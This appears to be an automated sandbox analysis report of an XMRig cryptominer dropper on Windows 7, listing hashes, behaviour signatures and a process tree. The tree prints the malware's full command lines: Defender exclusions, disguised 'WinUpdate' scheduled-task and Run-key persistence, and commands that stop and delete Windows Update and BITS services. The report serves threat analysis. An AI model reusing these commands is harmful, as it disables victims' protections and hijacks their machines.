Analysis
-
max time kernel
150s -
max time network
134s -
platform
windows7_x64 -
resource
win7-20220901-en -
resource tags
-
submitted
27/11/2022, 03:09
General
-
Target
pGzGZdueZTK8TKi9ARKn8itsJQUzA2.exe
-
Size
7.7MB
-
MD5
35d36e5c4ffacf7a3cad954eda425d8e
-
SHA1
ae1e98f5bc2b738bf39e68d183743b35dca26f82
-
SHA256
37c310ae0f183b05b230fa7d6d22d56fee36edc4d207b073e7dd93fd93367041
-
SHA512
c742651b1c347fd1f169cd177884d1f0eff31ce095cf8454f0a1cd1347991d4fa54f32d79ad433e14d18462c3dfca36c543838abf1947ceeb66105fd76a9ad2c
-
SSDEEP
196608:lB+JjNXNRK3kqePGNHcYx4yL1Zs9Fu4mHw+VyZsh67F:lB+XDK3k1PGNHf91kHuvVyN7F
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 2 IoCs
-
Executes dropped EXE 1 IoCs
-
Stops running service(s) 3 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 1 IoCs
-
Drops file in System32 directory 5 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 3 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 30 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\pGzGZdueZTK8TKi9ARKn8itsJQUzA2.exe"C:\Users\Admin\AppData\Local\Temp\pGzGZdueZTK8TKi9ARKn8itsJQUzA2.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#doibl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WinUpdate' /tr '''C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WinUpdate' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WinUpdate" /t REG_SZ /f /d 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WinUpdate /tr "'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe'"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fgrzeauct#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "WinUpdate" } Else { "C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe" }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn WinUpdate3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#doibl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WinUpdate' /tr '''C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WinUpdate' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WinUpdate" /t REG_SZ /f /d 'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn WinUpdate /tr "'C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe'"3⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe laojusjcvw2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe illcaqsdrufiqvxo 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2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {0D61F962-27AF-43C7-83A4-F3D51B0028C7} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe"C:\Program Files\WindowsUpdateService\WindowsUpdate\WinUpdate.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
Filesize
7.7MB
MD535d36e5c4ffacf7a3cad954eda425d8e
SHA1ae1e98f5bc2b738bf39e68d183743b35dca26f82
SHA25637c310ae0f183b05b230fa7d6d22d56fee36edc4d207b073e7dd93fd93367041
SHA512c742651b1c347fd1f169cd177884d1f0eff31ce095cf8454f0a1cd1347991d4fa54f32d79ad433e14d18462c3dfca36c543838abf1947ceeb66105fd76a9ad2c
-
Filesize
7.7MB
MD535d36e5c4ffacf7a3cad954eda425d8e
SHA1ae1e98f5bc2b738bf39e68d183743b35dca26f82
SHA25637c310ae0f183b05b230fa7d6d22d56fee36edc4d207b073e7dd93fd93367041
SHA512c742651b1c347fd1f169cd177884d1f0eff31ce095cf8454f0a1cd1347991d4fa54f32d79ad433e14d18462c3dfca36c543838abf1947ceeb66105fd76a9ad2c
-
Filesize
7KB
MD5a2d2c59dabb90d79076c4b7e38831b55
SHA11a750261e8d49e28d887b1255f12b2525c5ae2a3
SHA25687f46e8f7902464c41af4bedd435925cf827dc35075bb4cabf093ac4e45290c1
SHA512605364671b4661da150dfe9af020e7594ad73080a1b9a1c0553fa9b8e461a871eaf6f0061339cdf504154d765f91881b983065861e369dcb09170c550423bb9a
-
Filesize
7KB
MD5a2d2c59dabb90d79076c4b7e38831b55
SHA11a750261e8d49e28d887b1255f12b2525c5ae2a3
SHA25687f46e8f7902464c41af4bedd435925cf827dc35075bb4cabf093ac4e45290c1
SHA512605364671b4661da150dfe9af020e7594ad73080a1b9a1c0553fa9b8e461a871eaf6f0061339cdf504154d765f91881b983065861e369dcb09170c550423bb9a
-
Filesize
7.7MB
MD535d36e5c4ffacf7a3cad954eda425d8e
SHA1ae1e98f5bc2b738bf39e68d183743b35dca26f82
SHA25637c310ae0f183b05b230fa7d6d22d56fee36edc4d207b073e7dd93fd93367041
SHA512c742651b1c347fd1f169cd177884d1f0eff31ce095cf8454f0a1cd1347991d4fa54f32d79ad433e14d18462c3dfca36c543838abf1947ceeb66105fd76a9ad2c
-
Filesize
12KB
-
Filesize
11.4MB
-
Filesize
10.1MB
-
Filesize
12KB
-
Filesize
124KB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
8.0MB
-
Filesize
128KB
-
Filesize
8.0MB
-
Filesize
12KB
-
Filesize
12KB
-
Filesize
124KB
-
Filesize
124KB
-
Filesize
11.4MB
-
Filesize
10.1MB
-
Filesize
12KB
-
Filesize
8KB
-
Filesize
12KB
-
Filesize
11.4MB
-
Filesize
10.1MB
-
Filesize
124KB
-
Filesize
10.1MB
-
Filesize
11.4MB
-
Filesize
124KB
-
Filesize
12KB
-
Filesize
124KB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
7.8MB
-
Filesize
10.1MB
-
Filesize
11.4MB
-
Filesize
124KB
-
Filesize
124KB
-
Filesize
12KB